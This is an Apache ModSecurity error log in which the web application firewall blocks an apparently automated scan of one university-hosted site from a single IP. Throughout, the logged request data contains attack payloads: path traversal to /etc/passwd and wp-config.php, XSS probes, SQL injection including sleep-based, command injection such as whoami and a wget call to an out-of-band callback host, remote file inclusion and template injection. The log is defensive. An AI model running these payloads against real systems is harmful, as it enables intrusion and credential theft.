[Tue Aug 29 11:41:40.547160 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAXHqEwAAAAT"]
[Tue Aug 29 11:41:42.832659 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcoNcgAAAAF"]
[Tue Aug 29 11:41:45.609352 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gpeyk48qsswnq4.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdECTcAAAAW"]
[Tue Aug 29 11:41:46.392539 2023] [:error] [pid 1857] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAdBfDkAAAAR"]
[Tue Aug 29 11:41:49.377363 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAc0Nm0AAAAM"]
[Tue Aug 29 11:41:56.380186 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdQ3cMAAAAV"]
[Tue Aug 29 11:41:57.452657 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdECYkAAAAW"]
[Tue Aug 29 11:41:59.532181 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdNKDoAAAAR"]
[Tue Aug 29 11:42:00.375993 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gu53zmotdd8mw7.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gu53zmotdd8mw7.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdXIj8AAAAd"]
[Tue Aug 29 11:42:01.360459 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAc@cVgAAAAL"]
[Tue Aug 29 11:42:04.382382 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdECZsAAAAW"]
[Tue Aug 29 11:42:05.417651 2023] [:error] [pid 1864] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdIZDYAAAAG"]
[Tue Aug 29 11:42:06.483008 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdNKE0AAAAR"]
[Tue Aug 29 11:42:07.500693 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdQ3eMAAAAV"]
[Tue Aug 29 11:42:08.361479 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAdTA@oAAAAY"]
[Tue Aug 29 11:42:08.364776 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdUczAAAAAZ"]
[Tue Aug 29 11:42:09.357065 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAdNKFIAAAAR"]
[Tue Aug 29 11:42:09.398421 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdcs8gAAAAC"]
[Tue Aug 29 11:42:11.403478 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAcvBjAAAAAJ"]
[Tue Aug 29 11:42:11.416338 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAcuUn8AAAAI"]
[Tue Aug 29 11:42:12.427525 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAc@cW0AAAAL"]
[Tue Aug 29 11:42:14.356259 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdi99IAAAAk"]
[Tue Aug 29 11:42:14.411664 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdECaoAAAAW"]
[Tue Aug 29 11:42:14.424833 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdNKF0AAAAR"]
[Tue Aug 29 11:42:15.396545 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAcvBjgAAAAJ"]
[Tue Aug 29 11:42:17.402039 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdOeQMAAAAS"]
[Tue Aug 29 11:42:19.370318 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAQSWzIAAAA0"]
[Tue Aug 29 11:42:19.411502 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAbo-bsAAAAi"]
[Tue Aug 29 11:42:21.556653 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdaZO8AAAAM"]
[Tue Aug 29 11:42:23.376841 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdsFgQAAAAo"]
[Tue Aug 29 11:42:24.366109 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdeQ1EAAAAQ"]
